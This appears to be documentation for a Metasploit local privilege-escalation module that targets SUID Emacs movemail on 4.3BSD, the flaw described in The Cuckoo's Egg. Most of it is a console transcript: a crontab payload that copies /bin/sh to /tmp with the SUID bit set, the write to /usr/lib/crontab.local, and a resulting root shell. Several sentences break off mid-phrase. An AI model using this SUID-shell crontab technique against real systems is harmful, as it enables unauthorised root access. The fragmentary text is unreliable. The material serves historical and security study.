This module exploits a SUID installation of the Emacs
to run a command as root by writing to 4.3BSD's
The vulnerability is documented in Cliff Stoll's book The Cuckoo's Egg.
A Docker environment for 4.3BSD on VAX is available at https://github.com/wvu/ye-olde-bsd.
Id Name -- ---- 0 /usr/lib/crontab.local
Set this to the absolute path to the SUID-root
If your payload is
cmd/unix/generic (suggested default), set this to
the command you want to run as root. The provided default will create a
SUID-root shell at
msf5 exploit(unix/local/emacs_movemail) > run [*] Setting a sane $PATH: /bin:/usr/bin:/usr/ucb:/etc [*] Current shell is /bin/sh [*] $PATH is /bin:/usr/bin:/usr/ucb:/etc [+] SUID-root [redacted] found [*] Preparing crontab with payload * * * * * root cp /bin/sh /tmp && chmod u+s /tmp/sh * * * * * root rm -f /usr/lib/crontab.local [*] Creating writable /usr/lib/crontab.local [+] Writing crontab to /usr/lib/crontab.local [!] Please wait at least one minute for effect [*] Exploit completed, but no session was created. msf5 exploit(unix/local/emacs_movemail) > sessions -1 [*] Starting interaction with 1... ls -l /usr/lib/crontab.local /tmp/sh /usr/lib/crontab.local not found -rwsr-xr-x 1 root 23552 Nov 22 15:17 /tmp/sh /tmp/sh -c whoami root